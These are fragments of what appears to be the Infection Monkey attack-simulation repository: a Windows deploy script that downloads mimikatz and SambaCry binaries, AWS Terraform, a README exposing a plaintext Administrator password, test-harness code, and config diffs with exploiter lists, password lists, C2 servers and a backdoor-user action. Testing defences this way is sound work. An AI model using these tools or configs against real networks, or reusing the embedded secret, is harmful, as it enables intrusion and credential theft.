        $mongodb_folder = Get-ChildItem -Path $binDir | Where-Object -FilterScript {
            ($_.Name -like "mongodb*")
        } | Select-Object -ExpandProperty Name
        # Move all files from extracted folder to mongodb folder
        New-Item -ItemType directory -Path (Join-Path -Path $binDir -ChildPath "mongodb")
        New-Item -ItemType directory -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "db")
    . .\windows\create_certificate.bat
    Pop-Location

    if ($agents)
    {
        # Adding binaries
        "Adding binaries"
        $binaries = (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\cc\binaries")
        New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue
        $webClient.DownloadFile($LINUX_32_BINARY_URL, (Join-Path -Path $binaries -ChildPath $LINUX_32_BINARY_PATH))
        $webClient.DownloadFile($LINUX_64_BINARY_URL, (Join-Path -Path $binaries -ChildPath $LINUX_64_BINARY_PATH))
        $webClient.DownloadFile($WINDOWS_32_BINARY_URL, (Join-Path -Path $binaries -ChildPath $WINDOWS_32_BINARY_PATH))
        $webClient.DownloadFile($WINDOWS_64_BINARY_URL, (Join-Path -Path $binaries -ChildPath $WINDOWS_64_BINARY_PATH))
    }
    # Check if NPM installed
    "Installing npm"
    try
    {
        $version = cmd.exe /c '"npm" --version 2>&1'
        if ($version -like "*is not recognized*")
        {
            throw System.Management.Automation.CommandNotFoundException
        }
        else
        {
            "Npm already installed"
        }
    }
    catch [System.Management.Automation.CommandNotFoundException]
    {
        "Downloading npm ..."
        $webClient.DownloadFile($NPM_URL, $TEMP_NPM_INSTALLER)
        Start-Process -Wait $TEMP_NPM_INSTALLER
        $env:Path = [System.Environment]::GetEnvironmentVariable("Path", "Machine")
        Remove-Item $TEMP_NPM_INSTALLER
    }
    & npm run dist
    Pop-Location

    # Create infection_monkey/bin directory if not already present
    $binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin")
    New-Item -ItemType directory -path $binDir -ErrorAction SilentlyContinue

    # Download upx
    if (!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe")))
    {
        "Downloading upx ..."
        $webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP)
        "Unzipping upx"
    # Download mimikatz binaries
    $mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL
    if (!(Test-Path -Path $mk32_path))
    {
        "Downloading mimikatz 32 binary"
        $webClient.DownloadFile($MK32_DLL_URL, $mk32_path)
    }
    $mk64_path = Join-Path -Path $binDir -ChildPath $MK64_DLL
    if (!(Test-Path -Path $mk64_path))
    {
        "Downloading mimikatz 64 binary"
        $webClient.DownloadFile($MK64_DLL_URL, $mk64_path)
    }

    # Download sambacry binaries
    $samba_path = Join-Path -Path $monkey_home -ChildPath $SAMBA_BINARIES_DIR
    $samba32_path = Join-Path -Path $samba_path -ChildPath $SAMBA_32_BINARY_NAME
    if (!(Test-Path -Path $samba32_path))
    {
        "Downloading sambacry 32 binary"
        $webClient.DownloadFile($SAMBA_32_BINARY_URL, $samba32_path)
    }
    $samba64_path = Join-Path -Path $samba_path -ChildPath $SAMBA_64_BINARY_NAME
    if (!(Test-Path -Path $samba64_path))
    {
        "Downloading sambacry 64 binary"
        $webClient.DownloadFile($SAMBA_64_BINARY_URL, $samba64_path)
    }

    "Script finished"
}

Deploy-Windows -monkey_home $monkey_home -branch $branch

FROM debian:stretch-slim

LABEL MAINTAINER="theonlydoo <theonlydoo@gmail.com>"

ARG RELEASE=1.8.0
ARG DEBIAN_FRONTEND=noninteractive

EXPOSE 5000

# Monkey maker
## About
Monkey maker is an environment on AWS designed for building monkey binaries.
The environment is deployed using the terraform scripts located in this directory.
## Setup
To set up, put an `accessKeys` file into the `./aws_keys` directory.
The contents of the `accessKeys` file should be as follows:
```ini
[default]
aws_access_key_id = <...>
aws_secret_access_key = <...>
```
Also review the `./terraform/config.tf` file.
Launch the environment by going into the `terraform` folder and running
```
terraform init
terraform apply
```
## Usage
To log in to Windows, use the credentials Administrator: %HwuzI!Uzsyfa=cB*XaQ6xxHqopfj)h)
You'll find docker files in `/home/ubuntu/docker_envs/linux/...`
To build the docker image for 32-bit linux:
```
cd /home/ubuntu/docker_envs/linux/py3-32
sudo docker build -t builder32 .
```
To build the docker image for 64-bit linux:
```
cd /home/ubuntu/docker_envs/linux/py3-64
sudo docker build -t builder64 .
```
To build the 32-bit monkey binary:
```
cd /home/ubuntu/monkey_folder/monkey
sudo docker run -v "$(pwd):/src" builder32 -c "export SRCDIR=/src/infection_monkey && /entrypoint.sh"
```
To build the 64-bit monkey binary:
```
cd /home/ubuntu/monkey_folder/monkey
sudo docker run -v "$(pwd):/src" builder64 -c "export SRCDIR=/src/infection_monkey && /entrypoint.sh"
```

4
envs/monkey_maker/aws_keys/.gitignore:

# Ignore everything in this directory
*
# Except this file
!.gitignore

provider "aws" {
  version                 = "~> 2.0"
  region                  = "eu-central-1"
  shared_credentials_file = "../aws_keys/accessKeys"
}

resource "aws_vpc" "monkey_maker" {
  cidr_block         = "10.0.0.0/24"
  enable_dns_support = true

  tags = {
    Name = "monkey_maker_vpc"
  }
}

resource "aws_internet_gateway" "monkey_maker_gateway" {
  vpc_id = "${aws_vpc.monkey_maker.id}"

  tags = {
    Name = "monkey_maker_gateway"
  }
}

// create routing table which points to the internet gateway
resource "aws_route_table" "monkey_maker_route" {
  vpc_id = "${aws_vpc.monkey_maker.id}"

  route {
    cidr_block = "0.0.0.0/0"
    gateway_id = "${aws_internet_gateway.monkey_maker_gateway.id}"
  }

  tags = {
    Name = "monkey_maker_route"
  }
}

// associate the routing table with the subnet
resource "aws_route_table_association" "subnet-association" {
  subnet_id      = "${aws_subnet.main.id}"
  route_table_id = "${aws_route_table.monkey_maker_route.id}"
}

resource "aws_subnet" "main" {
  vpc_id     = "${aws_vpc.monkey_maker.id}"
  cidr_block = "10.0.0.0/24"

  tags = {
    Name = "Main"
  }
}

resource "aws_security_group" "monkey_maker_sg" {
  name        = "monkey_maker_sg"
  description = "Allow remote access to the island"
  vpc_id      = "${aws_vpc.monkey_maker.id}"

  egress {
    from_port   = 0
    to_port     = 0
    protocol    = "-1"
    cidr_blocks = ["0.0.0.0/0"]
  }

  tags = {
    Name = "monkey_maker_sg"
  }
}

resource "aws_instance" "island_windows" {
  ami           = "ami-033b3ef27f8d1881d"
  instance_type = "t2.micro"
  private_ip    = "10.0.0.251"
  subnet_id     = "${aws_subnet.main.id}"
  key_name      = "monkey_maker"

  tags = {
    Name = "monkey_maker_windows"
  }

  vpc_security_group_ids      = ["${aws_security_group.monkey_maker_sg.id}"]
  associate_public_ip_address = true
}

resource "aws_instance" "island_linux" {
  ami           = "ami-0495203541087740a"
  instance_type = "t2.micro"
  private_ip    = "10.0.0.252"
  subnet_id     = "${aws_subnet.main.id}"
  key_name      = "monkey_maker"

  tags = {
    Name = "monkey_maker_linux"
  }

  vpc_security_group_ids      = ["${aws_security_group.monkey_maker_sg.id}"]
  associate_public_ip_address = true
}

from abc import ABCMeta, abstractmethod


class Analyzer(object, metaclass=ABCMeta):

    @abstractmethod
    def analyze_test_results(self):
        raise NotImplementedError()
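The abstract base only requires `analyze_test_results`; the concrete analyzers below implement it. As a minimal, self-contained sketch (the subclass name and data are invented for illustration, and the base class is restated so the snippet runs on its own):

```python
from abc import ABCMeta, abstractmethod


class Analyzer(object, metaclass=ABCMeta):
    @abstractmethod
    def analyze_test_results(self):
        raise NotImplementedError()


# Hypothetical analyzer, for illustration only: passes if every
# expected machine IP appears in a (stubbed) set of IPs seen by the island.
class StubTelemetryAnalyzer(Analyzer):
    def __init__(self, seen_ips, expected_ips):
        self.seen_ips = seen_ips
        self.expected_ips = expected_ips

    def analyze_test_results(self):
        return all(ip in self.seen_ips for ip in self.expected_ips)


result = StubTelemetryAnalyzer({"10.2.2.3", "10.2.2.2"}, ["10.2.2.2"]).analyze_test_results()
```

Because `analyze_test_results` is an `@abstractmethod`, instantiating `Analyzer` directly raises `TypeError`, so every analyzer is forced to provide a verdict method.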

from envs.monkey_zoo.blackbox.analyzers.analyzer import Analyzer
from envs.monkey_zoo.blackbox.analyzers.analyzer_log import AnalyzerLog


class CommunicationAnalyzer(Analyzer):

    def __init__(self, island_client, machine_ips):
        self.island_client = island_client

import logging
from datetime import timedelta

from envs.monkey_zoo.blackbox.analyzers.analyzer import Analyzer
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient

MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)

REPORT_URLS = [
    "api/report/security",
    "api/attack/report",
    "api/report/zero_trust/findings",
    "api/report/zero_trust/principles",
    "api/report/zero_trust/pillars"
]

logger = logging.getLogger(__name__)


class PerformanceAnalyzer(Analyzer):

    def __init__(self, island_client: MonkeyIslandClient, break_if_took_too_long=False):
        self.break_if_took_too_long = break_if_took_too_long
        self.island_client = island_client

    def analyze_test_results(self) -> bool:
        if not self.island_client.is_all_monkeys_dead():
            raise RuntimeError("Can't test report times since not all Monkeys have died.")

        # Collect timings for all pages
        self.island_client.clear_caches()
        report_resource_to_response_time = {}
        for url in REPORT_URLS:
            report_resource_to_response_time[url] = self.island_client.get_elapsed_for_get_request(url)

        # Calculate total time and check each page
        single_page_time_less_than_max = True
        total_time = timedelta()
        for page, elapsed in report_resource_to_response_time.items():
            logger.info(f"page {page} took {str(elapsed)}")
            total_time += elapsed
            if elapsed > MAX_ALLOWED_SINGLE_PAGE_TIME:
                single_page_time_less_than_max = False

        total_time_less_than_max = total_time < MAX_ALLOWED_TOTAL_TIME
        logger.info(f"total time is {str(total_time)}")

        performance_is_good_enough = total_time_less_than_max and single_page_time_less_than_max

        if self.break_if_took_too_long and not performance_is_good_enough:
            logger.warning(
                "Calling breakpoint - pausing to enable investigation of island. Type 'c' to continue once you're done "
                "investigating. Type 'p timings' and 'p total_time' to see performance information."
            )
            breakpoint()

        return performance_is_good_enough
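The pass/fail arithmetic in `analyze_test_results` can be checked in isolation. A sketch of just the thresholding step, with invented timings (the standalone function is ours, not part of the analyzer):

```python
from datetime import timedelta

MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)


def performance_is_good_enough(timings):
    # Mirrors the analyzer: every page must stay at or under the
    # single-page cap, and the sum of all pages under the total cap.
    total = sum(timings.values(), timedelta())
    return total < MAX_ALLOWED_TOTAL_TIME and all(
        elapsed <= MAX_ALLOWED_SINGLE_PAGE_TIME for elapsed in timings.values())


fast = performance_is_good_enough({"api/report/security": timedelta(seconds=1),
                                   "api/attack/report": timedelta(milliseconds=1500)})
slow = performance_is_good_enough({"api/report/security": timedelta(seconds=3)})
```

Note that a single slow page fails the check even when the total stays under the five-second budget, which matches the per-page `>` comparison in the analyzer.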

from datetime import timedelta
from time import sleep
import json


class MonkeyIslandClient(object):

    def is_all_monkeys_dead(self):
        query = {'dead': False}
        return len(self.find_monkeys_in_db(query)) == 0

    def clear_caches(self):
        """
        Tries to clear caches.
        :raises: If error (by error code), raises the error
        :return: The response
        """
        response = self.requests.get("api/test/clear_caches")
        response.raise_for_status()
        return response

    def get_elapsed_for_get_request(self, url):
        response = self.requests.get(url)
        if response.ok:
            LOGGER.debug(f"Got ok for {url} content peek:\n{response.content[:120].strip()}")
            return response.elapsed
        else:
            LOGGER.error(f"Trying to get {url} but got unexpected {str(response)}")
            # instead of raising for status, mark failed responses as maxtime
            return timedelta.max

import requests
import functools

# SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
import logging

LOGGER = logging.getLogger(__name__)


# noinspection PyArgumentList
class MonkeyIslandRequests(object):
    def __init__(self, server_address):
        self.addr = "https://{IP}/".format(IP=server_address)
        self.token = self.try_get_jwt_from_server()

    def try_get_jwt_from_server(self):
        try:
            return self.get_jwt_from_server()
        except requests.ConnectionError as err:
            LOGGER.error(
                "Unable to connect to island, aborting! Error information: {}. Server: {}".format(err, self.addr))
            assert False

    class _Decorators:
        @classmethod
        def refresh_jwt_token(cls, request_function):
            @functools.wraps(request_function)
            def request_function_wrapper(self, *args, **kwargs):
                self.token = self.try_get_jwt_from_server()
                # noinspection PyArgumentList
                return request_function(self, *args, **kwargs)

            return request_function_wrapper

    def get_jwt_from_server(self):
        resp = requests.post(self.addr + "api/auth",  # noqa: DUO123
                             json={"username": NO_AUTH_CREDS, "password": NO_AUTH_CREDS},
                             verify=False)
        return resp.json()["access_token"]

    @_Decorators.refresh_jwt_token
    def get(self, url, data=None):
        return requests.get(self.addr + url,  # noqa: DUO123
                            headers=self.get_jwt_header(),
                            params=data,
                            verify=False)

    @_Decorators.refresh_jwt_token
    def post(self, url, data):
        return requests.post(self.addr + url,  # noqa: DUO123
                             data=data,
                             headers=self.get_jwt_header(),
                             verify=False)

    @_Decorators.refresh_jwt_token
    def post_json(self, url, dict_data):
        return requests.post(self.addr + url,  # noqa: DUO123
                             json=dict_data,
                             headers=self.get_jwt_header(),
                             verify=False)

    @_Decorators.refresh_jwt_token
    def delete(self, url):
        return requests.delete(  # noqa: DUO123
            self.addr + url,
            headers=self.get_jwt_header(),
            verify=False
        )

    @_Decorators.refresh_jwt_token
    def get_jwt_header(self):
        return {"Authorization": "JWT " + self.token}
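The `refresh_jwt_token` decorator can be exercised without a live island. A simplified, self-contained sketch (the `FakeRequests` class and token strings are invented; only the decorator mirrors the code above):

```python
import functools


class _Decorators:
    @classmethod
    def refresh_jwt_token(cls, request_function):
        @functools.wraps(request_function)
        def request_function_wrapper(self, *args, **kwargs):
            # Fetch a fresh token before every decorated request.
            self.token = self.try_get_jwt_from_server()
            return request_function(self, *args, **kwargs)

        return request_function_wrapper


# Hypothetical stand-in for MonkeyIslandRequests, for illustration only.
class FakeRequests:
    def __init__(self):
        self.calls = 0
        self.token = None

    def try_get_jwt_from_server(self):
        self.calls += 1
        return "token-{}".format(self.calls)

    @_Decorators.refresh_jwt_token
    def get(self, url):
        return self.token, url


client = FakeRequests()
first = client.get("api/report/security")
second = client.get("api/attack/report")
```

Each call goes through the wrapper first, so the token is re-issued per request rather than only at construction time, which is what keeps long test runs from failing on JWT expiry.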

    "local_network_scan": false,
    "subnet_scan_list": [
      "10.2.2.3",
      "10.2.2.2"
    ]
  },
  "network_analysis": {

View File

@@ -2,15 +2,18 @@
   "basic": {
     "credentials": {
       "exploit_password_list": [
-        "`))jU7L(w}",
-        "3Q=(Ge(+&w]*",
-        "^NgDvY59~8",
-        "Ivrrw5zEzs",
-        "YbS,<tpS.2av"
+        "Password1!",
+        "12345678",
+        "^NgDvY59~8"
       ],
       "exploit_user_list": [
-        "m0nk3y"
+        "Administrator",
+        "m0nk3y",
+        "user"
       ]
+    },
+    "general": {
+      "should_exploit": true
     }
   },
   "basic_network": {
@@ -20,24 +23,7 @@
     "local_network_scan": false,
     "subnet_scan_list": [
       "10.2.2.2",
-      "10.2.2.3",
-      "10.2.2.4",
-      "10.2.2.5",
-      "10.2.2.8",
-      "10.2.2.9",
-      "10.2.1.9",
-      "10.2.1.10",
-      "10.2.2.11",
-      "10.2.2.12",
-      "10.2.2.14",
-      "10.2.2.15",
-      "10.2.2.16",
-      "10.2.2.18",
-      "10.2.2.19",
-      "10.2.2.20",
-      "10.2.2.21",
-      "10.2.2.23",
-      "10.2.2.24"
+      "10.2.2.4"
     ]
   },
   "network_analysis": {
@@ -47,10 +33,9 @@
   "cnc": {
     "servers": {
       "command_servers": [
-        "192.168.56.1:5000",
-        "158.129.18.132:5000"
+        "10.2.2.251:5000"
       ],
-      "current_server": "192.168.56.1:5000",
+      "current_server": "10.2.2.251:5000",
       "internet_services": [
         "monkey.guardicore.com",
         "www.google.com"
@@ -60,24 +45,21 @@
   "exploits": {
     "general": {
       "exploiter_classes": [
-        "SmbExploiter",
-        "WmiExploiter",
-        "ShellShockExploiter",
-        "SambaCryExploiter",
+        "SSHExploiter",
+        "MSSQLExploiter",
         "ElasticGroovyExploiter",
-        "Struts2Exploiter",
-        "WebLogicExploiter",
         "HadoopExploiter"
       ],
       "skip_exploit_if_file_exist": false
     },
     "ms08_067": {
       "ms08_067_exploit_attempts": 5,
-      "ms08_067_remote_user_add": "Monkey_IUSER_SUPPORT",
-      "ms08_067_remote_user_pass": "Password1!",
       "remote_user_pass": "Password1!",
       "user_to_add": "Monkey_IUSER_SUPPORT"
     },
-    "rdp_grinder": {
-      "rdp_use_vbs_download": true
-    },
     "sambacry": {
       "sambacry_folder_paths_to_guess": [
         "/",
@@ -110,16 +92,15 @@
         "MySQLFinger",
         "MSSQLFinger",
         "ElasticFinger"
-      ],
-      "scanner_class": "TcpScanner"
+      ]
     },
     "dropper": {
       "dropper_date_reference_path_linux": "/bin/sh",
       "dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
       "dropper_set_date": true,
       "dropper_target_path_linux": "/tmp/monkey",
-      "dropper_target_path_win_32": "C:\\Windows\\monkey32.exe",
-      "dropper_target_path_win_64": "C:\\Windows\\monkey64.exe",
+      "dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
+      "dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
       "dropper_try_move_first": true
     },
     "exploits": {
@@ -128,7 +109,8 @@
       "exploit_ssh_keys": []
     },
     "general": {
-      "keep_tunnel_open_time": 60,
+      "keep_tunnel_open_time": 1,
+      "monkey_dir_name": "monkey_dir",
       "singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
     },
     "kill_file": {
@@ -145,32 +127,34 @@
   },
   "monkey": {
     "behaviour": {
-      "self_delete_in_cleanup": false,
+      "PBA_linux_filename": "",
+      "PBA_windows_filename": "",
+      "custom_PBA_linux_cmd": "",
+      "custom_PBA_windows_cmd": "",
+      "self_delete_in_cleanup": true,
      "serialize_config": false,
      "use_file_logging": true
    },
    "general": {
      "alive": true,
-      "post_breach_actions": [
-        "BackdoorUser"
-      ]
+      "post_breach_actions": []
    },
    "life_cycle": {
      "max_iterations": 1,
      "retry_failed_explotation": true,
      "timeout_between_iterations": 100,
-      "victims_max_exploit": 30,
+      "victims_max_exploit": 7,
      "victims_max_find": 30
    },
    "system_info": {
      "collect_system_info": true,
-      "extract_azure_creds": true,
+      "extract_azure_creds": false,
      "should_use_mimikatz": true
    }
  },
  "network": {
    "ping_scanner": {
-      "ping_scan_timeout": 1000
+      "ping_scan_timeout": 500
    },
    "tcp_scanner": {
      "HTTP_PORTS": [
@@ -181,8 +165,8 @@
        7001
      ],
      "tcp_scan_get_banner": true,
-      "tcp_scan_interval": 200,
-      "tcp_scan_timeout": 3000,
+      "tcp_scan_interval": 0,
+      "tcp_scan_timeout": 1000,
      "tcp_target_ports": [
        22,
        2222,
@@ -199,4 +183,4 @@
      ]
    }
  }
 }

View File

@@ -23,7 +23,7 @@
     "depth": 2,
     "local_network_scan": false,
     "subnet_scan_list": [
-      "10.2.2.38"
+      "10.2.2.8"
     ]
   },
   "network_analysis": {

View File

@@ -21,7 +21,7 @@
     "depth": 2,
     "local_network_scan": false,
     "subnet_scan_list": [
-      "10.2.2.44",
+      "10.2.2.14",
       "10.2.2.15"
     ]
   },

View File

@@ -22,8 +22,8 @@
     "depth": 2,
     "local_network_scan": false,
     "subnet_scan_list": [
-      "10.2.2.41",
-      "10.2.2.42"
+      "10.2.2.11",
+      "10.2.2.12"
     ]
   },
   "network_analysis": {

View File

@@ -10,7 +10,8 @@
     "exploit_user_list": [
       "Administrator",
       "root",
-      "user"
+      "user",
+      "vakaris_zilius"
     ]
   },
   "general": {
@@ -23,8 +24,8 @@
     "depth": 2,
     "local_network_scan": false,
     "subnet_scan_list": [
-      "10.2.2.9",
-      "10.2.2.11"
+      "10.2.2.23",
+      "10.2.2.24"
     ]
   },
   "network_analysis": {
@@ -46,16 +47,7 @@
   "exploits": {
     "general": {
       "exploiter_classes": [
-        "SmbExploiter",
-        "WmiExploiter",
-        "SSHExploiter",
-        "ShellShockExploiter",
-        "SambaCryExploiter",
-        "ElasticGroovyExploiter",
-        "Struts2Exploiter",
-        "WebLogicExploiter",
-        "HadoopExploiter",
-        "VSFTPDExploiter"
+        "Struts2Exploiter"
       ],
       "skip_exploit_if_file_exist": false
     },
@@ -64,9 +56,6 @@
       "remote_user_pass": "Password1!",
       "user_to_add": "Monkey_IUSER_SUPPORT"
     },
-    "rdp_grinder": {
-      "rdp_use_vbs_download": true
-    },
     "sambacry": {
       "sambacry_folder_paths_to_guess": [
         "/",
@@ -116,7 +105,7 @@
       "exploit_ssh_keys": []
     },
     "general": {
-      "keep_tunnel_open_time": 1,
+      "keep_tunnel_open_time": 60,
       "monkey_dir_name": "monkey_dir",
       "singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
     },
@@ -144,19 +133,27 @@
     },
     "general": {
       "alive": true,
-      "post_breach_actions": []
+      "post_breach_actions": [
+        "CommunicateAsNewUser"
+      ]
     },
     "life_cycle": {
       "max_iterations": 1,
       "retry_failed_explotation": true,
       "timeout_between_iterations": 100,
-      "victims_max_exploit": 7,
-      "victims_max_find": 30
+      "victims_max_exploit": 15,
+      "victims_max_find": 100
     },
     "system_info": {
       "collect_system_info": true,
       "extract_azure_creds": true,
-      "should_use_mimikatz": true
+      "should_use_mimikatz": true,
+      "system_info_collectors_classes": [
+        "EnvironmentCollector",
+        "AwsCollector",
+        "HostnameCollector",
+        "ProcessListCollector"
+      ]
     }
   },
   "network": {
@@ -186,7 +183,8 @@
         8008,
         3306,
         9200,
-        7001
+        7001,
+        8088
       ]
     }
   }

View File

@@ -5,10 +5,16 @@
       "Password1!",
       "3Q=(Ge(+&w]*",
       "`))jU7L(w}",
-      "12345678"
+      "t67TC5ZDmz",
+      "12345678",
+      "another_one",
+      "and_another_one",
+      "one_more"
     ],
     "exploit_user_list": [
       "Administrator",
+      "rand",
+      "rand2",
       "m0nk3y",
       "user"
     ]
@@ -23,9 +29,10 @@
     "depth": 3,
     "local_network_scan": false,
     "subnet_scan_list": [
-      "10.2.2.32",
+      "10.2.2.9",
       "10.2.1.10",
-      "10.2.0.11"
+      "10.2.0.11",
+      "10.2.0.12"
     ]
   },
   "network_analysis": {

View File

@@ -21,7 +21,7 @@
     "depth": 2,
     "local_network_scan": false,
     "subnet_scan_list": [
-      "10.2.2.44",
+      "10.2.2.14",
       "10.2.2.15"
     ]
   },

View File

@@ -4,6 +4,7 @@ import logging
 import pytest
 from time import sleep

+from envs.monkey_zoo.blackbox.analyzers.performance_analyzer import PerformanceAnalyzer
 from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
 from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import CommunicationAnalyzer
 from envs.monkey_zoo.blackbox.island_client.island_config_parser import IslandConfigParser
@@ -13,9 +14,9 @@ from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import TestLogsHand
 DEFAULT_TIMEOUT_SECONDS = 5*60
 MACHINE_BOOTUP_WAIT_SECONDS = 30
-GCP_TEST_MACHINE_LIST = ['sshkeys-11', 'sshkeys-12', 'elastic-4', 'elastic-5', 'haddop-2-v3', 'hadoop-3', 'mssql-16',
-                         'mimikatz-14', 'mimikatz-15', 'final-test-struts2-23', 'final-test-struts2-24',
-                         'tunneling-9', 'tunneling-10', 'tunneling-11', 'weblogic-18', 'weblogic-19', 'shellshock-8']
+GCP_TEST_MACHINE_LIST = ['sshkeys-11', 'sshkeys-12', 'elastic-4', 'elastic-5', 'hadoop-2', 'hadoop-3', 'mssql-16',
+                         'mimikatz-14', 'mimikatz-15', 'struts2-23', 'struts2-24', 'tunneling-9', 'tunneling-10',
+                         'tunneling-11', 'tunneling-12', 'weblogic-18', 'weblogic-19', 'shellshock-8']
 LOG_DIR_PATH = "./logs"
 LOGGER = logging.getLogger(__name__)
@@ -58,12 +59,30 @@ class TestMonkeyBlackbox(object):
         config_parser = IslandConfigParser(conf_filename)
         analyzer = CommunicationAnalyzer(island_client, config_parser.get_ips_of_targets())
         log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path())
-        BasicTest(test_name,
-                  island_client,
-                  config_parser,
-                  [analyzer],
-                  timeout_in_seconds,
-                  log_handler).run()
+        BasicTest(
+            name=test_name,
+            island_client=island_client,
+            config_parser=config_parser,
+            analyzers=[analyzer],
+            timeout=timeout_in_seconds,
+            post_exec_analyzers=[],
+            log_handler=log_handler).run()
+
+    @staticmethod
+    def run_performance_test(island_client, conf_filename, test_name, timeout_in_seconds):
+        config_parser = IslandConfigParser(conf_filename)
+        log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path())
+        BasicTest(
+            name=test_name,
+            island_client=island_client,
+            config_parser=config_parser,
+            analyzers=[CommunicationAnalyzer(island_client, config_parser.get_ips_of_targets())],
+            timeout=timeout_in_seconds,
+            post_exec_analyzers=[PerformanceAnalyzer(
+                island_client,
+                break_if_took_too_long=False
+            )],
+            log_handler=log_handler).run()

     @staticmethod
     def get_log_dir_path():
@@ -99,12 +118,26 @@ class TestMonkeyBlackbox(object):
     def test_shellshock_exploiter(self, island_client):
         TestMonkeyBlackbox.run_basic_test(island_client, "SHELLSHOCK.conf", "Shellshock_exploiter")

+    @pytest.mark.xfail(reason="Test fails randomly - still investigating.")
     def test_tunneling(self, island_client):
-        TestMonkeyBlackbox.run_basic_test(island_client, "TUNNELING.conf", "Tunneling_exploiter", 10*60)
+        TestMonkeyBlackbox.run_basic_test(island_client, "TUNNELING.conf", "Tunneling_exploiter", 15*60)

     def test_wmi_and_mimikatz_exploiters(self, island_client):
         TestMonkeyBlackbox.run_basic_test(island_client, "WMI_MIMIKATZ.conf", "WMI_exploiter,_mimikatz")

     def test_wmi_pth(self, island_client):
         TestMonkeyBlackbox.run_basic_test(island_client, "WMI_PTH.conf", "WMI_PTH")

+    @pytest.mark.xfail(reason="Performance is slow, will improve on release 1.9.")
+    def test_performance(self, island_client):
+        """
+        This test includes the SSH + Elastic + Hadoop + MSSQL machines all in one test,
+        for a total of 8 machines including the Monkey Island.
+        It has 2 analyzers - the regular one, which checks all the Monkeys,
+        and the timing one, which checks how long the report took to execute.
+        """
+        TestMonkeyBlackbox.run_performance_test(
+            island_client,
+            "PERFORMANCE.conf",
+            "test_report_performance",
+            timeout_in_seconds=10*60)

View File

@@ -1,4 +1,3 @@
-import json
 from time import sleep

 import logging
@@ -14,16 +13,16 @@ LOGGER = logging.getLogger(__name__)
 class BasicTest(object):

-    def __init__(self, name, island_client, config_parser, analyzers, timeout, log_handler):
+    def __init__(self, name, island_client, config_parser, analyzers, timeout, post_exec_analyzers, log_handler):
         self.name = name
         self.island_client = island_client
         self.config_parser = config_parser
         self.analyzers = analyzers
+        self.post_exec_analyzers = post_exec_analyzers
         self.timeout = timeout
         self.log_handler = log_handler

     def run(self):
-        LOGGER.info("Uploading configuration:\n{}".format(json.dumps(self.config_parser.config_json, indent=2)))
         self.island_client.import_config(self.config_parser.config_raw)
         self.print_test_starting_info()
         try:
@@ -33,13 +32,13 @@ class BasicTest(object):
             self.island_client.kill_all_monkeys()
             self.wait_until_monkeys_die()
             self.wait_for_monkey_process_to_finish()
+            self.test_post_exec_analyzers()
             self.parse_logs()
             self.island_client.reset_env()

     def print_test_starting_info(self):
         LOGGER.info("Started {} test".format(self.name))
-        LOGGER.info("Machines participating in test:")
-        LOGGER.info(" ".join(self.config_parser.get_ips_of_targets()))
+        LOGGER.info("Machines participating in test: " + ", ".join(self.config_parser.get_ips_of_targets()))
         print("")

     def test_until_timeout(self):
@@ -63,10 +62,8 @@ class BasicTest(object):
                     timer.get_time_taken()))

     def all_analyzers_pass(self):
-        for analyzer in self.analyzers:
-            if not analyzer.analyze_test_results():
-                return False
-        return True
+        analyzers_results = [analyzer.analyze_test_results() for analyzer in self.analyzers]
+        return all(analyzers_results)

     def get_analyzer_logs(self):
         log = ""
@@ -95,4 +92,9 @@ class BasicTest(object):
         If we try to launch a monkey during that time window, the monkey will fail to start; that's
         why the test needs to wait a bit even after all monkeys are dead.
         """
+        LOGGER.debug("Waiting for Monkey process to close...")
         sleep(TIME_FOR_MONKEY_PROCESS_TO_FINISH)
+
+    def test_post_exec_analyzers(self):
+        post_exec_analyzers_results = [analyzer.analyze_test_results() for analyzer in self.post_exec_analyzers]
+        assert all(post_exec_analyzers_results)
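The refactored `all_analyzers_pass` above deliberately materializes every analyzer result in a list before calling `all(...)`, so each analyzer runs (and can log its verdict) even after an earlier one fails; a generator passed to `all()` would short-circuit at the first failure. A small self-contained sketch of that difference (the analyzer names and `make_analyzer` helper here are made up for illustration):

```python
calls = []


def make_analyzer(name, result):
    """Build a fake analyzer that records when it runs and returns a fixed verdict."""
    def analyze():
        calls.append(name)  # record that this analyzer actually ran
        return result
    return analyze


analyzers = [make_analyzer("a", False), make_analyzer("b", True)]

# List comprehension: every analyzer runs before the combined verdict is computed.
calls.clear()
verdict = all([a() for a in analyzers])
assert calls == ["a", "b"] and verdict is False

# Generator: all() short-circuits on the first falsy result, skipping analyzer "b".
calls.clear()
verdict = all(a() for a in analyzers)
assert calls == ["a"] and verdict is False
```

Running all analyzers first gives a complete picture in the test logs, at the cost of doing work whose outcome can no longer change the verdict.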

View File

@@ -546,6 +546,38 @@ fullTest.conf is a good config to start, because it covers all machines.
   </tbody>
 </table>

+<table>
+  <thead>
+    <tr class="header">
+      <th><p><span id="_Toc536021463" class="anchor"></span>Nr. <strong>12</strong> Tunneling M4</p>
+      <p>(10.2.0.12)</p></th>
+      <th>(Exploitable)</th>
+    </tr>
+  </thead>
+  <tbody>
+    <tr class="odd">
+      <td>OS:</td>
